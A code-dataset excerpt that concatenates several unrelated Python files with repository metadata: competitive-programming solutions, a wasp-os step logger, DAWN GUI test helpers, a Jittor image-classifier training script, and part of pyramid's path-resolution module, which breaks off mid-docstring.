                pair_sums[s] = pair_sums.get(s, 0) + 1
            count = (count + pair_sums.get(target - arr[i], 0)) % MOD
        return count
| aditya-doshatti/Leetcode | 3sum_with_multiplicity_923.py | 3sum_with_multiplicity_923.py | py | 942 | python | en | code | 0 | github-code | 90 |
18558931219 |
N,K = map(int,input().split())
# For each b in (K, N], count a in [1, N] with a % b >= K: every complete
# run of b consecutive values contributes (b - K) qualifying residues, plus
# a partial tail of N % b values.
ans = 0
for b in range(K+1,N+1):
    tmp = 0
    # Floor division is exact for any magnitude of N, unlike int(N / b),
    # which round-trips through a float.
    multi = N // b
    tmp += (b-K) * multi
    if K==0:
        # With K == 0 every residue in the tail qualifies.
        tmp += max(0,N%b)
    else:
        # Residues K .. N % b qualify in the partial tail.
        tmp += max(0,(N%b-K+1))
    ans += tmp
print(ans) | Aasthaengg/IBMdataset | Python_codes/p03418/s014451154.py | s014451154.py | py | 230 | python | en | code | 0 | github-code | 90 |
16543319519 | import array
import os
import time
import wasp
from micropython import const
TICK_PERIOD = const(6 * 60)
DUMP_LENGTH = const(30)
DUMP_PERIOD = const(DUMP_LENGTH * TICK_PERIOD)
class StepIterator:
def __init__(self, fname, data=None):
self._fname = fname
self._f = None
self._d = data
def __del__(self):
self.close()
def __iter__(self):
self.close()
self._f = open(self._fname, 'rb')
self._c = 0
return self
def __next__(self):
self._c += 1
if self._c > (24*60*60) // TICK_PERIOD:
raise StopIteration
if self._f:
spl = self._f.read(2)
if spl:
return spl[0] + (spl[1] << 8)
self.close()
self._i = 0
if self._d and self._i < len(self._d):
i = self._i
self._i += 1
return self._d[i]
return 0
def close(self):
if self._f:
self._f.close()
self._f = None
class StepLogger:
    """Periodically sample the accelerometer step counter and persist the
    per-interval deltas to flash as little-endian 16-bit values, one file
    per day under ``logs/<year>/<mm>-<dd>.steps``.
    """
    def __init__(self, manager):
        # RAM buffer of DUMP_LENGTH unsigned-short deltas ('H' = uint16).
        self._data = array.array('H', (0,) * DUMP_LENGTH)
        # Step count at the previous tick, used to compute deltas.
        self._steps = wasp.watch.accel.steps
        try:
            os.mkdir('logs')
        except:
            # directory probably exists already (MicroPython: no exist_ok)
            pass
        # Queue a tick
        # Align the first tick to a TICK_PERIOD boundary.
        self._t = int(wasp.watch.rtc.time()) // TICK_PERIOD * TICK_PERIOD
        manager.set_alarm(self._t + TICK_PERIOD, self._tick)
    def _tick(self):
        """Capture the current step count in N minute intervals.
        The samples are queued in a small RAM buffer in order to reduce
        the number of flash access. The data is written out every few hours
        in a binary format ready to be reloaded and graphed when it is
        needed.
        """
        t = self._t
        # Work out where we are in the dump period
        i = t % DUMP_PERIOD // TICK_PERIOD
        # Get the current step count and record it
        steps = wasp.watch.accel.steps
        self._data[i] = steps - self._steps
        self._steps = steps
        # Queue the next tick
        wasp.system.set_alarm(t + TICK_PERIOD, self._tick)
        self._t += TICK_PERIOD
        # Only flush to flash once the RAM buffer is full.
        if i < (DUMP_LENGTH-1):
            return
        # Record the data in the flash
        walltime = time.localtime(t)
        yyyy = walltime[0]
        mm = walltime[1]
        dd = walltime[2]
        # Find when (in seconds) "today" started
        then = int(time.mktime((yyyy, mm, dd, 0, 0, 0, 0, 0, 0)))
        elapsed = t - then
        # Work out how dumps we expect to find in today's dumpfile
        dump_num = elapsed // DUMP_PERIOD
        # Update the log data
        try:
            os.mkdir('logs/' + str(yyyy))
        except:
            pass
        fname = 'logs/{}/{:02d}-{:02d}.steps'.format(yyyy, mm, dd)
        # Byte offset of this dump: 2 bytes per sample.
        offset = dump_num * DUMP_LENGTH * 2
        try:
            sz = os.stat(fname)[6]
        except:
            # file does not exist yet
            sz = 0
        f = open(fname, 'ab')
        # This is a portable (between real Python and MicroPython) way to
        # grow the file to the right size.
        f.seek(min(sz, offset))
        for _ in range(sz, offset, 2):
            f.write(b'\x00\x00')
        f.write(self._data)
        f.close()
        # Wipe the data
        data = self._data
        for i in range(DUMP_LENGTH):
            data[i] = 0
    def data(self, t):
        """Return a StepIterator over the samples for day *t* (a time tuple
        or an epoch timestamp), or None when no log file exists for it.
        For "today", the not-yet-flushed RAM buffer is appended as a live
        tail so the latest counts are included.
        """
        try:
            yyyy = t[0]
        except:
            # t was an epoch timestamp, not a time tuple
            t = time.localtime(t)
            yyyy = t[0]
        mm = t[1]
        dd = t[2]
        fname = 'logs/{}/{:02d}-{:02d}.steps'.format(yyyy, mm, dd)
        try:
            os.stat(fname)
        except:
            return None
        # Record the data in the flash
        now = time.localtime(self._t)
        if now[:3] == t[:3]:
            latest = self._data
            # Work out where we are in the dump period and update
            # with the latest counts
            i = self._t % DUMP_PERIOD // TICK_PERIOD
            latest[i] = wasp.watch.accel.steps - self._steps
        else:
            latest = None
        return StepIterator(fname, latest)
| wasp-os/wasp-os | wasp/steplogger.py | steplogger.py | py | 4,091 | python | en | code | 752 | github-code | 90 |
5909488510 | source(findFile("scripts", "dawn_global_startup.py"))
source(findFile("scripts", "dawn_global_plot_tests.py"))
source(findFile("scripts", "swt_treeitems.py"))
source(findFile("scripts", "dawn_global_ui_controls.py"))
# Start Function fitting on metalmix.mca
def startFunctionFitting():
    """Open DAWN, load examples/metalmix.mca and launch the Function
    Fitting tool from the XY plotting toolbar.

    The Squish UI-driver globals (waitForObject*, mouseClick, type, ...)
    come from the helper scripts sourced at the top of this file.
    """
    #Start using clean workspace
    startOrAttachToDAWN()
    # Open data browsing perspective
    openPerspective("Data Browsing")
    #expand data tree and open metal mix
    expand(waitForObjectItem(":Project Explorer_Tree", "data"))
    expand(waitForObjectItem(":Project Explorer_Tree", "examples"))
    children = object.children(waitForObjectItem(":Project Explorer_Tree", "examples"))
    for child in children:
        if "metalmix.mca" in child.text:
            doubleClick(child)
            # NOTE(review): `continue` keeps scanning after the first match;
            # `break` looks intended -- confirm before changing.
            continue
    # Widget ids differ between Eclipse 3.x and 4.x based builds.
    if(isEclipse4()):
        mouseClick(waitForObjectItem(":Data_Table_3", "0/0"), 12, 6, 0, Button.Button1)
    else:
        mouseClick(waitForObjectItem(":Data_Table", "0/0"), 12, 6, 0, Button.Button1)
    snooze(1)
    # start function fitting
    if(isEclipse4()):
        mouseClick(waitForObject(":XY plotting tools_ToolItem_3"), 28, 14, 0, Button.Button1)
    else:
        mouseClick(waitForObject(":XY plotting tools_ToolItem_2"), 28, 14, 0, Button.Button1)
    activateItem(waitForObjectItem(":Pop Up Menu", "Maths and Fitting"))
    if(isEclipse4()):
        activateItem(waitForObjectItem(":Maths and Fitting_Menu_2", "Function Fitting"))
    else:
        activateItem(waitForObjectItem(":Maths and Fitting_Menu", "Function Fitting"))
def setFunctionFittingRegion(regionStart, regionLength):
    """Set the fitting region in the 'Configure Graph Settings' dialog.

    *regionStart* and *regionLength* are typed into rows 0 and 1 of the
    Regions table; the dialog is then confirmed with OK.  ``type`` here is
    Squish's keyboard function, not the builtin.
    """
    # Open the settings dialog (widget id depends on the Eclipse version).
    if(isEclipse4()):
        mouseClick(waitForObject(":Configure Settings..._ToolItem_4"), 8, 13, 0, Button.Button1)
    else:
        mouseClick(waitForObject(":Configure Settings..._ToolItem_3"), 12, 16, 0, Button.Button1)
    clickTab(waitForObject(":Configure Graph Settings.Regions_TabItem"))
    # Row 0: region start.  Click twice to enter cell-edit mode, select-all,
    # then overwrite with the new value.
    mouseClick(waitForObjectItem(":Regions.Region Location_Table", "0/1"))
    mouseClick(waitForObjectItem(":Regions.Region Location_Table", "0/1"), 34, 16, 0, Button.Button1)
    type(waitForObject(":Regions_Text"), "<Ctrl+a>")
    type(waitForObject(":Regions_Text"), str(regionStart))
    type(waitForObject(":Regions_Text"), "<Return>")
    # Row 1: region length.
    mouseClick(waitForObjectItem(":Regions.Region Location_Table", "1/1"))
    mouseClick(waitForObjectItem(":Regions.Region Location_Table", "1/1"), 64, 2, 0, Button.Button1)
    type(waitForObject(":Regions_Text"), "<Ctrl+a>")
    type(waitForObject(":Regions_Text"), str(regionLength))
    type(waitForObject(":Regions_Text"), "<Numpad Return>")
    clickButton(waitForObject(":Configure Graph Settings.OK_Button"))
def insertFunction(functionName):
    """Add *functionName* to the fit via the Function Fitting tree.

    <Insert> opens the inline editor; the two <Return>s commit the typed
    name and accept the default parameters.
    """
    clickTab(waitForObject(":Function Fitting_CTabItem"))
    type(waitForObject(":Function Fitting_Tree"), "<Insert>")
    type(waitForObject(":Function Fitting_Text"), str(functionName))
    type(waitForObject(":Function Fitting_Text"), "<Return>")
    type(waitForObject(":Function Fitting_Text"), "<Return>")
# Set the field on the given path
# path is passed to get_swt_tree_item to get the treeitem, see help for that
# field is one of below constants (i.e. column number)
# value is new value to put in field
FUNCTION_COL=0
VALUE_COL=1
LOWER_LIMIT_COL=2
UPPER_LIMIT_COL=3
FITTED_PARAMETERS_COL=4
def setField(path, column, value):
    """Type *value* into the cell at (*path*, *column*) of the Function
    Fitting tree; *column* is one of the *_COL constants above."""
    subitem = get_swt_tree_sub_item(waitForObject(":Function Fitting_Tree"), path, column)
    mouseClick(subitem)
    # `type` is Squish's keyboard-input function, not the builtin.
    type(waitForObject(":Function Fitting_Text"), str(value))
    type(waitForObject(":Function Fitting_Text"), "<Return>")
# Get the field value of the specified path and column
# See setField for use of path/column argument
def getField(path, column):
    """Return the text of the cell at (*path*, *column*) in the Function
    Fitting tree; *column* is one of the *_COL constants above."""
    subitem = get_swt_tree_sub_item(waitForObject(":Function Fitting_Tree"), path, column)
    return subitem.text
| DawnScience/dawn-test | org.dawnsci.squishtests/suite_tools1d_functionfitting/shared/scripts/function_fitting_common.py | function_fitting_common.py | py | 3,880 | python | en | code | 3 | github-code | 90 |
5423634237 | import jittor as jt
import jittor.nn as nn
from dataset import TsinghuaDog
from jittor import transform
from jittor.optim import Adam, SGD
from tqdm import tqdm
import numpy as np
from model import Net
import argparse
jt.flags.use_cuda=1
def train(model, train_loader, optimizer, epoch):
    """Run one training epoch, updating the tqdm bar with loss/accuracy.

    Args:
        model: network, switched to train mode for the duration of the call.
        train_loader: iterable of (images, labels) batches.
        optimizer: jittor optimizer; ``step(loss)`` backprops and updates.
        epoch: epoch index, used only for progress display.

    The original accumulated total_acc / total_num / losses but never used
    them; dropping the dead accumulation also stops ``losses += loss`` from
    retaining every batch's graph.
    """
    model.train()
    pbar = tqdm(train_loader, desc=f'Epoch {epoch} [TRAIN]')
    for images, labels in pbar:
        output = model(images)
        loss = nn.cross_entropy_loss(output, labels)
        # jittor's optimizer.step takes the loss and performs backward + update.
        optimizer.step(loss)
        pred = np.argmax(output.data, axis=1)
        acc = np.mean(pred == labels.data) * 100
        pbar.set_description(
            f'Epoch {epoch} [TRAIN] loss = {loss.data[0]:.2f}, acc = {acc:.2f}')
best_acc = -1.0
def evaluate(model, val_loader, epoch=0, save_path='./best_model.pkl'):
    """Evaluate *model* on *val_loader*; checkpoint it whenever the accuracy
    beats the module-level ``best_acc`` high-water mark."""
    model.eval()
    global best_acc
    total_acc = 0
    total_num = 0
    for images, labels in val_loader:
        output = model(images)
        pred = np.argmax(output.data, axis=1)
        # number of correct predictions in this batch
        acc = np.sum(pred == labels.data)
        total_acc += acc
        total_num += labels.shape[0]
    # overall accuracy as a fraction in [0, 1]
    acc = total_acc / total_num
    if acc > best_acc:
        best_acc = acc
        model.save(save_path)
    print ('Test in epoch', epoch, 'Accuracy is', acc, 'Best accuracy is', best_acc)
def main():
    """Parse CLI arguments, build the TsinghuaDog loaders, and either
    evaluate a checkpoint (--eval) or train for --epochs epochs."""
    parser = argparse.ArgumentParser()
    # NOTE(review): --batch_size is parsed but the loaders below hard-code
    # batch_size=16, and --weight_decay is never passed to SGD -- confirm.
    parser.add_argument('--batch_size', type=int, default=8)
    parser.add_argument('--epochs', type=int, default=50)
    parser.add_argument('--num_classes', type=int, default=130)
    parser.add_argument('--lr', type=float, default=2e-3)
    parser.add_argument('--weight_decay', type=float, default=1e-5)
    # NOTE(review): argparse type=bool treats ANY non-empty string as True
    # ("--resume False" enables resuming); action='store_true' is the usual
    # fix, but it changes the CLI, so flagging instead of changing.
    parser.add_argument('--resume', type=bool, default=False)
    parser.add_argument('--eval', type=bool, default=False)
    parser.add_argument('--dataroot', type=str, default='/home/gmh/dataset/TsinghuaDog/')
    parser.add_argument('--model_path', type=str, default='./best_model.pkl')
    args = parser.parse_args()
    # Training-time augmentation: resize, random crop + horizontal flip,
    # then ImageNet-style normalization.
    transform_train = transform.Compose([
        transform.Resize((512, 512)),
        transform.RandomCrop(448),
        transform.RandomHorizontalFlip(),
        transform.ToTensor(),
        transform.ImageNormalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
    ])
    root_dir = args.dataroot
    train_loader = TsinghuaDog(root_dir, batch_size=16, train=True, part='train', shuffle=True, transform=transform_train)
    # Deterministic center crop for validation.
    transform_test = transform.Compose([
        transform.Resize((512, 512)),
        transform.CenterCrop(448),
        transform.ToTensor(),
        transform.ImageNormalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
    ])
    val_loader = TsinghuaDog(root_dir, batch_size=16, train=False, part='val', shuffle=False, transform=transform_test)
    epochs = args.epochs
    model = Net(num_classes=args.num_classes)
    lr = args.lr
    weight_decay = args.weight_decay
    optimizer = SGD(model.parameters(), lr=lr, momentum=0.9)
    if args.resume:
        model.load(args.model_path)
    if args.eval:
        # Evaluation-only mode: score once and exit.
        evaluate(model, val_loader)
        return
    for epoch in range(epochs):
        train(model, train_loader, optimizer, epoch)
        evaluate(model, val_loader, epoch)
if __name__ == '__main__':
main()
| Jittor/TsinghuaDogBaseline | main.py | main.py | py | 3,388 | python | en | code | 9 | github-code | 90 |
18331868319 | N=int(input())
L=list(map(int,input().split()))
L = sorted(L)
def binary_search(func, array, left=0):
    """Locate the boundary where the monotone predicate *func* flips.

    Starting from *left*, bisect [lo, hi] keeping func(array[lo]) equal to
    its initial value until the interval narrows to width one; return lo.
    Returns 0 straight away when func is already false at *left*.
    """
    lo = left
    hi = len(array) - 1
    first = func(array[lo])
    func(array[hi])  # evaluated for parity with the original code path
    if first == False:  # == False kept: matches the original's semantics
        return 0
    while True:
        mid = (lo + hi) // 2
        if func(array[mid]) == first:
            lo = mid
        else:
            hi = mid
        if hi - lo == 1:
            break
    return lo
# Count triples i < j < k whose side lengths can form a triangle, i.e.
# L[k] < L[i] + L[j] (L is sorted ascending above).
SUM = 0
for i in range(N-2):
    for j in range(i+1,N-1):
        # l is the sum of the two shorter sides.
        l = L[i]+L[j]
        if L[-1]<l:
            # even the largest element is valid -> all k up to N-1 count
            k = N-1
        else:
            # last index (> j) whose value is still strictly below l
            k = binary_search(lambda x: x<l, L, j+1)
        SUM += max(0,k-j)
print(SUM) | Aasthaengg/IBMdataset | Python_codes/p02888/s638158726.py | s638158726.py | py | 615 | python | en | code | 0 | github-code | 90 |
34361093960 | #documentation and comments for the main and create random array can be found in the mergeTime program
import random
import time
def createRanArray(n):
    """Return a list of *n* pseudo-random integers in [0, 10000]."""
    return [random.randrange(10001) for _ in range(n)]
#Insert sort function takes in an array and sorts it
#iterates through the array and moves the values up to their propper spot
def insertSort(arr=None):
    """Sort *arr* in place with insertion sort; returns None.

    Uses the shift-based formulation: each element is held in *key* while
    larger predecessors slide one slot right.  Unlike the original swap
    loop, the scan stops as soon as the sorted prefix is in order, so
    already-sorted input runs in O(n) instead of O(n^2).
    """
    for i in range(1, len(arr)):
        key = arr[i]
        k = i
        # Shift strictly-larger elements right; stopping on <= keeps the
        # sort stable, like the original.
        while k > 0 and arr[k-1] > key:
            arr[k] = arr[k-1]
            k = k - 1
        arr[k] = key
    return
def main():
    """Smoke-test insertSort, then time it on 10 growing random arrays.

    Uses time.perf_counter(): time.clock() was deprecated in 3.3 and
    removed in Python 3.8.  The unused curTime placeholder and arrSizes
    list from the original were dropped.
    """
    random.seed()
    insertSortTimes = [None] * 10
    n = 3000
    # quick visual sanity check on a small array
    tempArr = createRanArray(100)
    print(tempArr)
    insertSort(tempArr)
    print(tempArr)
    for i in range(0, 10):
        start = time.perf_counter()
        insertSort(createRanArray(n))
        insertSortTimes[i] = time.perf_counter() - start
        print(n, insertSortTimes[i])
        n = n + 2000
main()
| jwright303/Algorithm-Analysis | SortingAlgorithms/insertTime.py | insertTime.py | py | 1,266 | python | en | code | 0 | github-code | 90 |
1303597880 | # Create an empty adjacency list for each node in the graph
graph = {}
num_nodes = int(input("Enter number of nodes: "))
for node in range(num_nodes):
graph[node] = []
# Add each edge to the adjacency list of its source and destination nodes
num_edges = int(input("Enter number of edges: "))
for i in range(num_edges):
u, v = input(f"Enter edge {i+1} (source destination): ").split()
u = int(u)
v = int(v)
graph[u].append(v)
graph[v].append(u)
# Track visited nodes; a set makes each membership test O(1)
# (the original list made `neighbor not in visited` O(n) per check).
visited = set()

# Define a recursive function to perform DFS
def dfs(node):
    """Visit *node*, print it, then recurse into unvisited neighbors."""
    # Print the current node
    print(node, end=" ")
    # Visit each neighbor of the current node that hasn't been visited yet
    for neighbor in graph[node]:
        if neighbor not in visited:
            visited.add(neighbor)
            dfs(neighbor)

# Start the DFS from node 0
visited.add(0)
dfs(0)
# Enter number of nodes: 6
# Enter number of edges: 6
# 0 1
# 0 2
# 1 3
# 1 4
# 2 5
# 4 5
# 0 1 3 4 5 2 | KunalNathani/prax | p_dfs.py | p_dfs.py | py | 1,027 | python | en | code | 0 | github-code | 90 |
72676095338 | from math import ceil
avg_speed = float(input())
gas_for_100km = float(input())

# Distance to the Moon and back, in km.
round_trip_km = 384400 * 2

# Travel hours rounded up, plus 3 hours for docking.
hours = ceil(round_trip_km / avg_speed) + 3
fuel_needed = (gas_for_100km * round_trip_km) / 100

print(hours)
print(f'{fuel_needed:.0f}')
| Yani-Jivkov/Basic-Python-Exams | EXAM2/2.1.py | 2.1.py | py | 238 | python | en | code | 0 | github-code | 90 |
73904907175 | '''
Prompt #1
Clusters of Activity
# # Problem Link: https://repl.it/student/submissions/9814047
# Write a function that accepts a 2D plane as a dictionary. The dictionary represents a segment of a map, and it contains map coordinates as keys, and a count of outbreaks in the area as values. The map may be huge, which is why we're using a dictionary(because most of the map will be 0s otherwise.)
# Find the center of the outbreak. The center is defined as the average of all points, but treat each case as one data point(eg, if there are 10 reports in one location, add that location to the average 10 times). Round to the nearest integer values, but return as a string: "x,y".
Example Data:
reported_outbreak = {
"5,5": 10,
"5,6": 8,
"5,4": 8,
"4,5": 8,
"4,5": 8,
"4,6": 8,
"6,6": 7,
"6,5": 8,
"4,4": 8,
"3,4": 4,
"3,3": 2,
"6,7": 2
}
'''
def find_center(matrix):
    """Return the case-weighted center of the outbreak as a string "x,y".

    *matrix* maps "x,y" coordinate strings to outbreak counts.  Per the
    prompt above, each case weights its location once and the averaged
    coordinates are rounded to the nearest integers.

    The original crashed on any input (undefined ``coord``, splitting on
    " , " when the keys contain no spaces, and summing str coordinates);
    this version implements the documented contract and weights by count
    instead of looping once per case.
    """
    total_x = 0
    total_y = 0
    total_cases = 0
    for coords, cases in matrix.items():
        x_str, y_str = coords.split(",")
        # Weighting by the count is equivalent to adding the point once
        # per reported case.
        total_x += int(x_str) * cases
        total_y += int(y_str) * cases
        total_cases += cases
    avg_x = round(total_x / total_cases)
    avg_y = round(total_y / total_cases)
    return f"{avg_x},{avg_y}"
reported_outbreak = {
"5,5": 10,
"5,6": 8,
"5,4": 8,
"4,5": 8,
"4,5": 8,
"4,6": 8,
"6,6": 7,
"6,5": 8,
"4,4": 8,
"3,4": 4,
"3,3": 2,
"6,7": 2
}
print(find_center(reported_outbreak))
'''
Prompt 2:
Natural Language Calculator
You are working on a very small part of a natural language processing engine. You want your engine to be able to respond to math properly. Your colleagues have written a program that can identify when a user is asking a math question, but they haven't written a calculator!
Your job is to create a calculator that will parse natural language, and speak in natural language. To simplify the problem, you will only ever receive two operands, and all operands will be under one hundred.
Given a statement like:
"add two and seven"
return "nine".
"subtract six from four"
return "negative two"
To help with this, recognize that dictionaries can hold any value, including functions!
'''
def nlp_calculator(statement):
    """Evaluate a four-word math sentence like "add two and seven".

    Word 0 resolves to an operation and words 1 and 3 to operands via the
    ``translator`` table; the integer result is translated back into its
    word form and returned.
    """
    commands = statement.split(" ")
    # translate the command into a function
    func = translator.get(commands[0])
    # print(f"Commands:{commands}")
    first_number = translator.get(commands[1])
    second_number = translator.get(commands[3])
    # print(f"first_number: {first_number }, second_number: {second_number} ")
    # Arguments are deliberately reversed so "subtract X from Y" computes
    # Y - X (commands[3] is Y, commands[1] is X).
    result = func(second_number, first_number)
    # print(f"result:{result}")
    transalted_result = translator.get(result)
    # print(f"transalted_result:{transalted_result}")
    return transalted_result
    # return ""
def add(a, b):
    """Return a + b; dispatched from the translator table by nlp_calculator."""
    return a + b
def subtract(a, b):
    """Return a - b; nlp_calculator calls this as subtract(second, first) so
    that "subtract X from Y" yields Y - X."""
    return a - b
translator = {
"add": add,
"subtract": subtract,
"one": 1,
"two": 2,
"three": 3,
"four": 4,
"five": 5,
"six": 6,
"seven": 7,
"eight": 8,
"nine": 9,
1: "one",
2: "two",
3: "three",
4: "four",
5: "five",
6: "six",
7: "seven",
8: "eight",
9: "nine",
-2: "negative two"
}
test1 = "add two and seven"
test2 = "subtract six from four"
print(nlp_calculator(test1))
# print(nlp_calculator(test2))
| campbellmarianna/Code-Challenges | python/abcs_course_remote/mod_9_prob.py | mod_9_prob.py | py | 3,299 | python | en | code | 0 | github-code | 90 |
70779174058 | import yaml
import sys
import os
with open("settings.conf", "r") as ymlfile:
cfg = yaml.full_load(ymlfile)
courses_downloaded = []
with open(cfg["save_location"] + "course_list.txt", "r") as f:
for line in f:
course = line[:-1]
courses_downloaded.append(course)
for i in range(len(courses_downloaded)):
course_name = courses_downloaded[i]
old_name = cfg["save_location"] + 'course_files_export (' + str(i) + ').zip'
if(i == 0):
old_name = cfg["save_location"] + "course_files_export.zip"
new_name = cfg["save_location"] + str(course_name) + '.zip'
os.rename(old_name, new_name)
| colbyjanecka/canvas-scraper | rename_folders.py | rename_folders.py | py | 632 | python | en | code | 0 | github-code | 90 |
33702652057 | # 문제 : 색칠하기
# 어린 토니킴은 색칠공부를 좋아한다.
# 토니킴은 먼저 여러 동그라미와 동그라미 두 개를 연결하는 직선들 만으로 그림을 그리고 (모든 동그라미들 사이에 직선이 있을 필요는 없다),
# 연결된 두 동그라미는 서로 색이 다르게 되도록 색을 칠하고자 한다.
# 이 그림을 색칠하는데 필요한 최소의 색의 개수를 구하는 문제는 어렵기 때문에 토니킴은 2 가지 색상으로 색칠이 가능한지의 여부만을 알고 싶어한다.
# 동그라미들의 번호와 동그라미들이 서로 연결된 직선에 대한 정보가 주어졌을 때, 이 동그라미들이 2 가지 색상으로 색칠이 가능한지 알아내자.
import sys
def dfs(x, pre_value):
    """2-color the component containing *x*, starting with color *pre_value*.

    Colors are 1 and 2 (``3 - c`` flips between them).  Sets the global
    *flag* to False when two adjacent nodes demand the same color, i.e.
    the component is not bipartite.  Implemented iteratively with an
    explicit stack: the original recursed once per edge but never raised
    the recursion limit (sys is imported yet unused), so long chains of
    circles would overflow the default limit.  The final verdict is
    unchanged: colors are parity-determined within a component, and any
    odd cycle still forces flag = False.
    """
    global flag
    stack = [(x, pre_value)]
    while stack:
        node, color = stack.pop()
        if vis[node] == 0:
            vis[node] = color
            for nxt in graph[node]:
                stack.append((nxt, 3 - color))
        elif vis[node] != color:
            flag = False
    return
# One 2-colorability ("can we paint with two colors?") test per test case.
for i in range(int(input())):
    # n = number of circles (1-based vertices), m = number of lines (edges)
    n,m = map(int,input().split())
    graph = [[] for _ in range(n+1)]
    # vis[v]: 0 = uncolored, 1/2 = the two colors
    vis = [0 for _ in range(n+1)]
    for j in range(m):
        x,y = map(int,input().split())
        graph[x].append(y)
        graph[y].append(x)
    flag = True
    # Color every connected component, each starting from color 1.
    for k in range(1,n+1):
        if vis[k] == 0:
            dfs(k,1)
    print("possible" if flag else"impossible")
| kimujinu/python_PS | 13265.py | 13265.py | py | 1,389 | python | ko | code | 0 | github-code | 90 |
18535829499 | import sys
sys.setrecursionlimit(10 ** 6)
def dfs(s, pos):
    """Extend substring *s* (occurring at end indices *pos*) by one character.

    Candidate extensions are visited in lexicographic order and each added
    to the global result set *A*; recursion stops once more than K distinct
    substrings are collected, since only the K smallest matter.
    """
    global N, K
    ns = {}
    # Prune: we already have enough substrings to select the K-th smallest.
    if len(A) > K:
        return
    for i in pos:
        ni = i + 1
        if ni < N:
            # x = s extended by the character following occurrence i.
            x = s + S[ni]
            if x in ns:
                ns[x].append(ni)
            else:
                ns[x] = [ni]
    candidate = []
    for x in list(ns.keys()):
        candidate.append((x, ns[x]))
    # Lexicographic order guarantees smaller substrings are recorded first.
    candidate.sort()
    for c, idx in candidate:
        A.add(c)
        dfs(c, idx)
S = list(input())
N = len(S)
K = int(input())
# Seed the search with each letter a-z, in lexicographic order.
alpha = [chr(ord('a') + i) for i in range(26)]
A = set()
for c in alpha:
    # Stop seeding new letters once K distinct substrings are known;
    # anything starting with a later letter cannot be among the K smallest.
    if len(A) < K:
        pos = []
        # Collect every position where the one-character substring c occurs.
        for i, s in enumerate(S):
            if c == s:
                A.add(c)
                pos.append(i)
        dfs(c, pos)
A = list(A)
A.sort()
| Aasthaengg/IBMdataset | Python_codes/p03353/s380139072.py | s380139072.py | py | 810 | python | en | code | 0 | github-code | 90 |
9275603948 | import os
import pkg_resources
import sys
import imp
ignore_types = [imp.C_EXTENSION, imp.C_BUILTIN]
init_names = ['__init__%s' % x[0] for x in imp.get_suffixes() if
x[0] and x[2] not in ignore_types]
def caller_path(path, level=2):
    """Return *path* absolutized relative to the caller's package directory.

    Absolute paths come back unchanged; *level* selects which stack frame
    counts as the caller.
    """
    if os.path.isabs(path):
        return path
    module = caller_module(level + 1)
    return os.path.join(package_path(module), path)
def caller_module(level=2, sys=sys):
    """Return the module whose frame sits *level* levels up the call stack.

    *sys* is injectable for tests.  Frames whose globals carry no
    ``__name__`` are attributed to ``__main__``.
    """
    frame_globals = sys._getframe(level).f_globals
    name = frame_globals.get('__name__') or '__main__'
    return sys.modules[name]
def package_name(pkg_or_module):
    """ If this function is passed a module, return the dotted Python
    package name of the package in which the module lives. If this
    function is passed a package, return the dotted Python package
    name of the package itself."""
    if pkg_or_module is None or pkg_or_module.__name__ == '__main__':
        return '__main__'
    pkg_filename = pkg_or_module.__file__
    pkg_name = pkg_or_module.__name__
    splitted = os.path.split(pkg_filename)
    # init_names (module level) lists the possible __init__ file names for
    # this interpreter; matching one means the object is a package.
    if splitted[-1] in init_names:
        # it's a package
        return pkg_name
    # Plain module: its package is the dotted name minus the last segment.
    return pkg_name.rsplit('.', 1)[0]
def package_of(pkg_or_module):
    """ Return the package of a module or return the package itself """
    pkg_name = package_name(pkg_or_module)
    # __import__ guarantees the package is actually loaded before the
    # sys.modules lookup below.
    __import__(pkg_name)
    return sys.modules[pkg_name]
def caller_package(level=2, caller_module=caller_module):
    """Return the package of the module *level* frames up the call stack."""
    # caller_module in arglist for tests
    module = caller_module(level + 1)
    f = getattr(module, '__file__', '')
    # '__init__$py' is the compiled-init filename on Jython.
    if (('__init__.py' in f) or ('__init__$py' in f)): # empty at >>>
        # Module is a package
        return module
    # Go up one level to get package
    package_name = module.__name__.rsplit('.', 1)[0]
    return sys.modules[package_name]
def package_path(package):
    """Return the filesystem directory of *package*, memoizing the result
    on the package object as ``__abspath__``."""
    # computing the abspath is actually kinda expensive so we memoize
    # the result
    prefix = getattr(package, '__abspath__', None)
    if prefix is None:
        prefix = pkg_resources.resource_filename(package.__name__, '')
        # pkg_resources doesn't care whether we feed it a package
        # name or a module name within the package, the result
        # will be the same: a directory name to the package itself
        try:
            package.__abspath__ = prefix
        except:
            # this is only an optimization, ignore any error
            pass
    return prefix
# Sentinel type meaning "resolve relative names against the caller's package".
class _CALLER_PACKAGE(object):
    def __repr__(self): # pragma: no cover (for docs)
        return 'pyramid.path.CALLER_PACKAGE'
# Singleton sentinel instance; compared by identity throughout this module.
CALLER_PACKAGE = _CALLER_PACKAGE()
class Resolver(object):
    """Base class for name resolvers.

    Normalizes the *package* constructor argument: ``None`` and the
    CALLER_PACKAGE sentinel are stored as-is, a dotted-name string is
    imported first, and any module is collapsed to its containing package.
    (``basestring`` marks this as Python 2 code.)
    """
    def __init__(self, package=CALLER_PACKAGE):
        if package in (None, CALLER_PACKAGE):
            self.package = package
        else:
            if isinstance(package, basestring):
                try:
                    __import__(package)
                except ImportError:
                    raise ValueError(
                        'The dotted name %r cannot be imported' % (package,)
                    )
                package = sys.modules[package]
            # Always store a package, never a plain module.
            self.package = package_of(package)
    def get_package_name(self):
        """Return the dotted name of the effective package; the sentinel is
        resolved lazily against the caller at each call."""
        if self.package is CALLER_PACKAGE:
            package_name = caller_package().__name__
        else:
            package_name = self.package.__name__
        return package_name
    def get_package(self):
        """Return the effective package object; the sentinel is resolved
        lazily against the caller at each call."""
        if self.package is CALLER_PACKAGE:
            package = caller_package()
        else:
            package = self.package
        return package
class DottedNameResolver(Resolver):
""" A class used to resolve a :term:`dotted Python name` to a package or
module object.
.. note:: This API is new as of Pyramid 1.3.
The constructor accepts a single argument named ``package`` which may be
any of:
- A fully qualified (not relative) dotted name to a module or package
- a Python module or package object
- The value ``None``
- The constant value :attr:`pyramid.path.CALLER_PACKAGE`.
The default value is :attr:`pyramid.path.CALLER_PACKAGE`.
The ``package`` is used when a relative dotted name is supplied to the
:meth:`~pyramid.path.DottedNameResolver.resolve` method. A dotted name
which has a ``.`` (dot) or ``:`` (colon) as its first character is
treated as relative.
If the value ``None`` is supplied as the ``package``, the resolver will
only be able to resolve fully qualified (not relative) names. Any
attempt to resolve a relative name when the ``package`` is ``None`` will
result in an :exc:`ValueError` exception.
If the value :attr:`pyramid.path.CALLER_PACKAGE` is supplied as the
